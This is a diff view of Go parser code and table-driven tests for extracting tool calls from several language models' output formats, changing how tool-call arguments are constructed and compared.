Name: "create",
Arguments: testArgs(map[string]any{
"config": map[string]any{
"settings": map[string]any{
"enabled": true,
"name": "test",
},
},
}),
},
},
},
expectedText: "",
},
{
name: "partial_start_tag_in_content",
chunks: []string{
"Hello", " ", "<", "start", " ", "world",
},
expectedCalls: nil,
expectedText: "Hello <start world",
},
{
name: "parallel_tool_calls",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "get", "_", "weather", "{",
"city", ":", "<", "escape", ">", "Paris", "<", "escape", ">",
"}", "<", "end", "_", "function", "_", "call", ">",
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "get", "_", "time", "{",
"timezone", ":", "<", "escape", ">", "UTC", "<", "escape", ">",
"}", "<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}),
},
},
{
Function: api.ToolCallFunction{
Name: "get_time",
Arguments: testArgs(map[string]any{"timezone": "UTC"}),
},
},
},
expectedText: "",
},
{
name: "content_between_tool_calls",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "first", "{", "}",
"<", "end", "_", "function", "_", "call", ">",
"Some", " ", "text", " ", "here",
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "second", "{", "}",
"<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "first",
Arguments: api.NewToolCallFunctionArguments(),
},
},
{
Function: api.ToolCallFunction{
Name: "second",
Arguments: api.NewToolCallFunctionArguments(),
},
},
},
expectedText: "Some text here",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
parser := &FunctionGemmaParser{}
parser.Init(tt.tools, nil, nil)
var allContent string
var allCalls []api.ToolCall
for i, chunk := range tt.chunks {
done := i == len(tt.chunks)-1
content, _, calls, err := parser.Add(chunk, done)
assert.NoError(t, err)
allContent += content
allCalls = append(allCalls, calls...)
}
// Handle empty chunks case
if len(tt.chunks) == 0 {
content, _, calls, err := parser.Add("", true)
assert.NoError(t, err)
allContent = content
allCalls = calls
}
assert.Equal(t, tt.expectedText, allContent)
if diff := cmp.Diff(tt.expectedCalls, allCalls, argsComparer); diff != "" {
t.Errorf("calls mismatch (-want +got):\n%s", diff)
}
})
}
}
func TestFunctionGemmaParser_HasSupport(t *testing.T) {
parser := &FunctionGemmaParser{}
assert.True(t, parser.HasToolSupport())
assert.False(t, parser.HasThinkingSupport())
}

View File

@ -112,8 +112,8 @@ func (p *MinistralParser) Add(s string, done bool) (content string, thinking str
before, _ := splitAtTag(&p.buffer, "}", false) before, _ := splitAtTag(&p.buffer, "}", false)
before += "}" before += "}"
var args api.ToolCallFunctionArguments var data map[string]any
if err := json.Unmarshal([]byte(before), &args); err != nil { if err := json.Unmarshal([]byte(before), &data); err != nil {
// todo - throw a better error // todo - throw a better error
return "", "", calls, err return "", "", calls, err
} }
@ -123,7 +123,7 @@ func (p *MinistralParser) Add(s string, done bool) (content string, thinking str
call := api.ToolCall{ call := api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: p.currentTool.Function.Name, Name: p.currentTool.Function.Name,
Arguments: args, Arguments: api.ToolCallFunctionArguments(data),
}, },
} }
calls = append(calls, call) calls = append(calls, call)

View File

@ -225,7 +225,7 @@ func (p *Nemotron3NanoParser) parseToolCall(content string) (api.ToolCall, error
toolCall.Function.Name = fnMatch[1] toolCall.Function.Name = fnMatch[1]
// Extract parameters // Extract parameters
toolCall.Function.Arguments = api.NewToolCallFunctionArguments() toolCall.Function.Arguments = make(api.ToolCallFunctionArguments)
paramMatches := nemotronParameterRegex.FindAllStringSubmatch(content, -1) paramMatches := nemotronParameterRegex.FindAllStringSubmatch(content, -1)
for _, match := range paramMatches { for _, match := range paramMatches {
if len(match) >= 3 { if len(match) >= 3 {
@ -233,7 +233,7 @@ func (p *Nemotron3NanoParser) parseToolCall(content string) (api.ToolCall, error
paramValue := strings.TrimSpace(match[2]) paramValue := strings.TrimSpace(match[2])
// Try to parse as typed value based on tool definition // Try to parse as typed value based on tool definition
toolCall.Function.Arguments.Set(paramName, p.parseParamValue(paramName, paramValue)) toolCall.Function.Arguments[paramName] = p.parseParamValue(paramName, paramValue)
} }
} }
@ -244,11 +244,9 @@ func (p *Nemotron3NanoParser) parseParamValue(paramName string, raw string) any
// Find the matching tool to get parameter type // Find the matching tool to get parameter type
var paramType api.PropertyType var paramType api.PropertyType
for _, tool := range p.tools { for _, tool := range p.tools {
if tool.Function.Parameters.Properties != nil { if prop, ok := tool.Function.Parameters.Properties[paramName]; ok {
if prop, ok := tool.Function.Parameters.Properties.Get(paramName); ok { paramType = prop.Type
paramType = prop.Type break
break
}
} }
} }

View File

@ -51,7 +51,7 @@ func TestNemotron3NanoParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}), Arguments: map[string]any{"city": "Paris"},
}, },
}, },
}, },
@ -65,7 +65,7 @@ func TestNemotron3NanoParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "NYC"}), Arguments: map[string]any{"city": "NYC"},
}, },
}, },
}, },
@ -78,10 +78,10 @@ func TestNemotron3NanoParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "book_flight", Name: "book_flight",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"from": "SFO", "from": "SFO",
"to": "NYC", "to": "NYC",
}), },
}, },
}, },
}, },
@ -95,13 +95,13 @@ func TestNemotron3NanoParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "San Francisco"}), Arguments: map[string]any{"city": "San Francisco"},
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "New York"}), Arguments: map[string]any{"city": "New York"},
}, },
}, },
}, },
@ -115,7 +115,7 @@ func TestNemotron3NanoParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}), Arguments: map[string]any{"city": "Paris"},
}, },
}, },
}, },
@ -130,7 +130,7 @@ func TestNemotron3NanoParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "search", Name: "search",
Arguments: testArgs(map[string]any{"query": "test"}), Arguments: map[string]any{"query": "test"},
}, },
}, },
}, },
@ -143,7 +143,7 @@ func TestNemotron3NanoParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "create_note", Name: "create_note",
Arguments: testArgs(map[string]any{"content": "Line 1\nLine 2\nLine 3"}), Arguments: map[string]any{"content": "Line 1\nLine 2\nLine 3"},
}, },
}, },
}, },
@ -165,7 +165,7 @@ func TestNemotron3NanoParser(t *testing.T) {
name: "tool call with no function name - returns empty tool call", name: "tool call with no function name - returns empty tool call",
input: "<tool_call>\n<function=>\n</function>\n</tool_call>", input: "<tool_call>\n<function=>\n</function>\n</tool_call>",
thinkValue: nil, thinkValue: nil,
expectedCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "", Arguments: api.NewToolCallFunctionArguments()}}}, expectedCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "", Arguments: nil}}},
}, },
{ {
name: "content with newlines preserved", name: "content with newlines preserved",
@ -194,7 +194,7 @@ func TestNemotron3NanoParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "set_temp", Name: "set_temp",
Arguments: testArgs(map[string]any{"value": "42"}), Arguments: map[string]any{"value": "42"},
}, },
}, },
}, },
@ -226,7 +226,7 @@ func TestNemotron3NanoParser(t *testing.T) {
if diff := cmp.Diff(thinking, tt.expectedThinking); diff != "" { if diff := cmp.Diff(thinking, tt.expectedThinking); diff != "" {
t.Errorf("thinking mismatch (-got +want):\n%s", diff) t.Errorf("thinking mismatch (-got +want):\n%s", diff)
} }
if diff := cmp.Diff(calls, tt.expectedCalls, argsComparer); diff != "" { if diff := cmp.Diff(calls, tt.expectedCalls); diff != "" {
t.Errorf("calls mismatch (-got +want):\n%s", diff) t.Errorf("calls mismatch (-got +want):\n%s", diff)
} }
}) })
@ -276,7 +276,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}), Arguments: map[string]any{"city": "Paris"},
}, },
}, },
}, },
@ -290,7 +290,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "NYC"}), Arguments: map[string]any{"city": "NYC"},
}, },
}, },
}, },
@ -302,7 +302,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "test", Name: "test",
Arguments: api.NewToolCallFunctionArguments(), Arguments: map[string]any{},
}, },
}, },
}, },
@ -329,10 +329,10 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "book_flight", Name: "book_flight",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"from": "SFO", "from": "SFO",
"to": "NYC", "to": "NYC",
}), },
}, },
}, },
}, },
@ -347,7 +347,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "search", Name: "search",
Arguments: testArgs(map[string]any{"query": "test query"}), Arguments: map[string]any{"query": "test query"},
}, },
}, },
}, },
@ -367,13 +367,13 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "San Francisco"}), Arguments: map[string]any{"city": "San Francisco"},
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "New York"}), Arguments: map[string]any{"city": "New York"},
}, },
}, },
}, },
@ -386,7 +386,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "create_note", Name: "create_note",
Arguments: testArgs(map[string]any{"content": "Line 1\nLine 2\nLine 3"}), Arguments: map[string]any{"content": "Line 1\nLine 2\nLine 3"},
}, },
}, },
}, },
@ -413,7 +413,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "test", Name: "test",
Arguments: api.NewToolCallFunctionArguments(), Arguments: map[string]any{},
}, },
}, },
}, },
@ -426,7 +426,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "test", Name: "test",
Arguments: testArgs(map[string]any{"name": ""}), Arguments: map[string]any{"name": ""},
}, },
}, },
}, },
@ -473,7 +473,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
if diff := cmp.Diff(allThinking, tt.expectedThinking); diff != "" { if diff := cmp.Diff(allThinking, tt.expectedThinking); diff != "" {
t.Errorf("thinking mismatch (-got +want):\n%s", diff) t.Errorf("thinking mismatch (-got +want):\n%s", diff)
} }
if diff := cmp.Diff(allCalls, tt.expectedCalls, argsComparer); diff != "" { if diff := cmp.Diff(allCalls, tt.expectedCalls); diff != "" {
t.Errorf("calls mismatch (-got +want):\n%s", diff) t.Errorf("calls mismatch (-got +want):\n%s", diff)
} }
}) })
@ -537,9 +537,9 @@ func TestNemotron3NanoParser_WithTools(t *testing.T) {
Name: "get_weather", Name: "get_weather",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}}, "city": {Type: api.PropertyType{"string"}},
}), },
}, },
}, },
}, },
@ -548,7 +548,7 @@ func TestNemotron3NanoParser_WithTools(t *testing.T) {
p := &Nemotron3NanoParser{} p := &Nemotron3NanoParser{}
returnedTools := p.Init(tools, nil, nil) returnedTools := p.Init(tools, nil, nil)
if diff := cmp.Diff(returnedTools, tools, toolsComparer); diff != "" { if diff := cmp.Diff(returnedTools, tools); diff != "" {
t.Errorf("tools mismatch (-got +want):\n%s", diff) t.Errorf("tools mismatch (-got +want):\n%s", diff)
} }
@ -563,12 +563,12 @@ func TestNemotron3NanoParser_WithTools(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}), Arguments: map[string]any{"city": "Paris"},
}, },
}, },
} }
if diff := cmp.Diff(calls, expectedCalls, argsComparer); diff != "" { if diff := cmp.Diff(calls, expectedCalls); diff != "" {
t.Errorf("calls mismatch (-got +want):\n%s", diff) t.Errorf("calls mismatch (-got +want):\n%s", diff)
} }
} }

View File

@ -242,8 +242,8 @@ func parseOlmo3SingleFunctionCall(s string) (api.ToolCall, error) {
// parseOlmo3Arguments parses comma-separated key=value pairs // parseOlmo3Arguments parses comma-separated key=value pairs
// Handles nested parentheses, brackets, braces, and quoted strings // Handles nested parentheses, brackets, braces, and quoted strings
func parseOlmo3Arguments(s string) (api.ToolCallFunctionArguments, error) { func parseOlmo3Arguments(s string) (map[string]any, error) {
args := api.NewToolCallFunctionArguments() args := make(map[string]any)
s = strings.TrimSpace(s) s = strings.TrimSpace(s)
if s == "" { if s == "" {
return args, nil return args, nil
@ -261,7 +261,7 @@ func parseOlmo3Arguments(s string) (api.ToolCallFunctionArguments, error) {
// Find the first = sign // Find the first = sign
eqIdx := strings.Index(part, "=") eqIdx := strings.Index(part, "=")
if eqIdx == -1 { if eqIdx == -1 {
return api.ToolCallFunctionArguments{}, fmt.Errorf("invalid argument format: %s", part) return nil, fmt.Errorf("invalid argument format: %s", part)
} }
key := strings.TrimSpace(part[:eqIdx]) key := strings.TrimSpace(part[:eqIdx])
@ -269,10 +269,10 @@ func parseOlmo3Arguments(s string) (api.ToolCallFunctionArguments, error) {
value, err := parseOlmo3Value(valueStr) value, err := parseOlmo3Value(valueStr)
if err != nil { if err != nil {
return api.ToolCallFunctionArguments{}, fmt.Errorf("failed to parse value for %s: %w", key, err) return nil, fmt.Errorf("failed to parse value for %s: %w", key, err)
} }
args.Set(key, value) args[key] = value
} }
return args, nil return args, nil

View File

@ -28,7 +28,7 @@ func TestOlmo3Parser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "San Francisco"}), Arguments: map[string]any{"location": "San Francisco"},
}, },
}, },
}, },
@ -41,7 +41,7 @@ func TestOlmo3Parser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "NYC"}), Arguments: map[string]any{"location": "NYC"},
}, },
}, },
}, },
@ -53,11 +53,11 @@ func TestOlmo3Parser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "book_flight", Name: "book_flight",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"from": "SFO", "from": "SFO",
"to": "NYC", "to": "NYC",
"date": "2024-01-15", "date": "2024-01-15",
}), },
}, },
}, },
}, },
@ -70,13 +70,13 @@ get_weather(location="New York")</function_calls>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "San Francisco"}), Arguments: map[string]any{"location": "San Francisco"},
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "New York"}), Arguments: map[string]any{"location": "New York"},
}, },
}, },
}, },
@ -88,7 +88,7 @@ get_weather(location="New York")</function_calls>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "set_temperature", Name: "set_temperature",
Arguments: testArgs(map[string]any{"value": int64(72)}), Arguments: map[string]any{"value": int64(72)},
}, },
}, },
}, },
@ -100,7 +100,7 @@ get_weather(location="New York")</function_calls>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "set_price", Name: "set_price",
Arguments: testArgs(map[string]any{"amount": 19.99}), Arguments: map[string]any{"amount": 19.99},
}, },
}, },
}, },
@ -112,7 +112,7 @@ get_weather(location="New York")</function_calls>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "toggle_setting", Name: "toggle_setting",
Arguments: testArgs(map[string]any{"enabled": true}), Arguments: map[string]any{"enabled": true},
}, },
}, },
}, },
@ -124,7 +124,7 @@ get_weather(location="New York")</function_calls>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "clear_value", Name: "clear_value",
Arguments: testArgs(map[string]any{"field": nil}), Arguments: map[string]any{"field": nil},
}, },
}, },
}, },
@ -136,7 +136,7 @@ get_weather(location="New York")</function_calls>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "process_items", Name: "process_items",
Arguments: testArgs(map[string]any{"items": []any{"apple", "banana", "cherry"}}), Arguments: map[string]any{"items": []any{"apple", "banana", "cherry"}},
}, },
}, },
}, },
@ -148,12 +148,12 @@ get_weather(location="New York")</function_calls>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "update_config", Name: "update_config",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"settings": map[string]any{ "settings": map[string]any{
"theme": "dark", "theme": "dark",
"fontSize": int64(14), "fontSize": int64(14),
}, },
}), },
}, },
}, },
}, },
@ -165,7 +165,7 @@ get_weather(location="New York")</function_calls>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "create_request", Name: "create_request",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"data": map[string]any{ "data": map[string]any{
"user": map[string]any{ "user": map[string]any{
"name": "John", "name": "John",
@ -173,7 +173,7 @@ get_weather(location="New York")</function_calls>`,
}, },
"active": true, "active": true,
}, },
}), },
}, },
}, },
}, },
@ -185,7 +185,7 @@ get_weather(location="New York")</function_calls>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_current_time", Name: "get_current_time",
Arguments: testArgs(map[string]any{}), Arguments: map[string]any{},
}, },
}, },
}, },
@ -197,7 +197,7 @@ get_weather(location="New York")</function_calls>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "search", Name: "search",
Arguments: testArgs(map[string]any{"query": "hello world"}), Arguments: map[string]any{"query": "hello world"},
}, },
}, },
}, },
@ -209,7 +209,7 @@ get_weather(location="New York")</function_calls>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "search", Name: "search",
Arguments: testArgs(map[string]any{"query": `say "hello"`}), Arguments: map[string]any{"query": `say "hello"`},
}, },
}, },
}, },
@ -221,11 +221,11 @@ get_weather(location="New York")</function_calls>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "create_user", Name: "create_user",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"name": "John", "name": "John",
"age": int64(30), "age": int64(30),
"active": true, "active": true,
}), },
}, },
}, },
}, },
@ -257,7 +257,7 @@ get_weather(location="New York")</function_calls>`,
if diff := cmp.Diff(thinking, tt.expectedThinking); diff != "" { if diff := cmp.Diff(thinking, tt.expectedThinking); diff != "" {
t.Errorf("thinking mismatch (-got +want):\n%s", diff) t.Errorf("thinking mismatch (-got +want):\n%s", diff)
} }
if diff := cmp.Diff(calls, tt.expectedCalls, argsComparer); diff != "" { if diff := cmp.Diff(calls, tt.expectedCalls); diff != "" {
t.Errorf("calls mismatch (-got +want):\n%s", diff) t.Errorf("calls mismatch (-got +want):\n%s", diff)
} }
}) })
@ -283,7 +283,7 @@ func TestOlmo3Parser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "SF"}), Arguments: map[string]any{"location": "SF"},
}, },
}, },
}, },
@ -296,7 +296,7 @@ func TestOlmo3Parser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "NYC"}), Arguments: map[string]any{"location": "NYC"},
}, },
}, },
}, },
@ -308,7 +308,7 @@ func TestOlmo3Parser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "test", Name: "test",
Arguments: testArgs(map[string]any{}), Arguments: map[string]any{},
}, },
}, },
}, },
@ -343,7 +343,7 @@ func TestOlmo3Parser_Streaming(t *testing.T) {
if diff := cmp.Diff(allContent, tt.expectedContent); diff != "" { if diff := cmp.Diff(allContent, tt.expectedContent); diff != "" {
t.Errorf("content mismatch (-got +want):\n%s", diff) t.Errorf("content mismatch (-got +want):\n%s", diff)
} }
if diff := cmp.Diff(allCalls, tt.expectedCalls, argsComparer); diff != "" { if diff := cmp.Diff(allCalls, tt.expectedCalls); diff != "" {
t.Errorf("calls mismatch (-got +want):\n%s", diff) t.Errorf("calls mismatch (-got +want):\n%s", diff)
} }
}) })
@ -378,7 +378,7 @@ func TestParseOlmo3FunctionCalls(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "SF"}), Arguments: map[string]any{"location": "SF"},
}, },
}, },
}, },
@ -390,11 +390,11 @@ func TestParseOlmo3FunctionCalls(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "send_email", Name: "send_email",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"to": "user@example.com", "to": "user@example.com",
"subject": "Hello", "subject": "Hello",
"body": "Test message", "body": "Test message",
}), },
}, },
}, },
}, },
@ -407,13 +407,13 @@ get_time(timezone="PST")`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "SF"}), Arguments: map[string]any{"location": "SF"},
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_time", Name: "get_time",
Arguments: testArgs(map[string]any{"timezone": "PST"}), Arguments: map[string]any{"timezone": "PST"},
}, },
}, },
}, },
@ -437,7 +437,7 @@ get_time(timezone="PST")`,
t.Errorf("parseOlmo3FunctionCalls() error = %v, wantErr %v", err, tt.wantErr) t.Errorf("parseOlmo3FunctionCalls() error = %v, wantErr %v", err, tt.wantErr)
return return
} }
if diff := cmp.Diff(calls, tt.expected, argsComparer); diff != "" { if diff := cmp.Diff(calls, tt.expected); diff != "" {
t.Errorf("calls mismatch (-got +want):\n%s", diff) t.Errorf("calls mismatch (-got +want):\n%s", diff)
} }
}) })

View File

@ -66,8 +66,6 @@ func ParserForName(name string) Parser {
return &Olmo3ThinkParser{} return &Olmo3ThinkParser{}
case "nemotron-3-nano": case "nemotron-3-nano":
return &Nemotron3NanoParser{} return &Nemotron3NanoParser{}
case "functiongemma":
return &FunctionGemmaParser{}
default: default:
return nil return nil
} }

View File

@ -270,12 +270,12 @@ func parseToolCall(raw qwenEventRawToolCall, tools []api.Tool) (api.ToolCall, er
} }
} }
toolCall.Function.Arguments = api.NewToolCallFunctionArguments() toolCall.Function.Arguments = make(api.ToolCallFunctionArguments)
for _, parameter := range functionCall.Parameters { for _, parameter := range functionCall.Parameters {
// Look up the parameter type if we found the tool // Look up the parameter type if we found the tool
var paramType api.PropertyType var paramType api.PropertyType
if matchedTool != nil && matchedTool.Function.Parameters.Properties != nil { if matchedTool != nil && matchedTool.Function.Parameters.Properties != nil {
if prop, ok := matchedTool.Function.Parameters.Properties.Get(parameter.Name); ok { if prop, ok := matchedTool.Function.Parameters.Properties[parameter.Name]; ok {
// Handle anyOf by collecting all types from the union // Handle anyOf by collecting all types from the union
if len(prop.AnyOf) > 0 { if len(prop.AnyOf) > 0 {
for _, anyOfProp := range prop.AnyOf { for _, anyOfProp := range prop.AnyOf {
@ -287,7 +287,7 @@ func parseToolCall(raw qwenEventRawToolCall, tools []api.Tool) (api.ToolCall, er
} }
} }
toolCall.Function.Arguments.Set(parameter.Name, parseValue(parameter.Value, paramType)) toolCall.Function.Arguments[parameter.Name] = parseValue(parameter.Value, paramType)
} }
return toolCall, nil return toolCall, nil

View File

@ -11,7 +11,7 @@ import (
func tool(name string, props map[string]api.ToolProperty) api.Tool { func tool(name string, props map[string]api.ToolProperty) api.Tool {
t := api.Tool{Type: "function", Function: api.ToolFunction{Name: name}} t := api.Tool{Type: "function", Function: api.ToolFunction{Name: name}}
t.Function.Parameters.Type = "object" t.Function.Parameters.Type = "object"
t.Function.Parameters.Properties = testPropsMap(props) t.Function.Parameters.Properties = props
return t return t
} }
@ -369,10 +369,10 @@ celsius
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_current_temperature", Name: "get_current_temperature",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location": "San Francisco", "location": "San Francisco",
"unit": "celsius", "unit": "celsius",
}), },
}, },
}, },
}, },
@ -390,10 +390,10 @@ celsius
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get current temperature", Name: "get current temperature",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location with spaces": "San Francisco", "location with spaces": "San Francisco",
"unit with spaces": "celsius", "unit with spaces": "celsius",
}), },
}, },
}, },
}, },
@ -415,10 +415,10 @@ San Francisco
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "\"get current temperature\"", Name: "\"get current temperature\"",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"\"location with spaces\"": "San Francisco", "\"location with spaces\"": "San Francisco",
"\"unit with spaces\"": "\"celsius\"", "\"unit with spaces\"": "\"celsius\"",
}), },
}, },
}, },
}, },
@ -449,12 +449,12 @@ true
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "calculate", Name: "calculate",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"x": 3.14, "x": 3.14,
"y": 42, "y": 42,
"enabled": true, "enabled": true,
"items": []any{"a", "b", "c"}, "items": []any{"a", "b", "c"},
}), },
}, },
}, },
}, },
@ -470,9 +470,9 @@ ls && echo "done"
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "exec", Name: "exec",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"command": "ls && echo \"done\"", "command": "ls && echo \"done\"",
}), },
}, },
}, },
}, },
@ -487,9 +487,9 @@ ls && echo "a > b and a < b"
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "exec", Name: "exec",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"command": "ls && echo \"a > b and a < b\"", "command": "ls && echo \"a > b and a < b\"",
}), },
}, },
}, },
}, },
@ -507,10 +507,10 @@ Hello! 你好! 🌟 مرحبا
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "获取天气", Name: "获取天气",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"城市": "北京", "城市": "北京",
"message": "Hello! 你好! 🌟 مرحبا", "message": "Hello! 你好! 🌟 مرحبا",
}), },
}, },
}, },
}, },
@ -521,7 +521,7 @@ Hello! 你好! 🌟 مرحبا
if err != nil { if err != nil {
t.Errorf("step %d (%s): %v", i, step.name, err) t.Errorf("step %d (%s): %v", i, step.name, err)
} }
if !toolCallEqual(gotToolCall, step.wantToolCall) { if !reflect.DeepEqual(gotToolCall, step.wantToolCall) {
t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall) t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall)
} }
} }

View File

@ -550,10 +550,10 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get-current-weather", Name: "get-current-weather",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location": "San Francisco, CA", "location": "San Francisco, CA",
"unit": "fahrenheit", "unit": "fahrenheit",
}), },
}, },
}, },
}, },
@ -564,10 +564,10 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
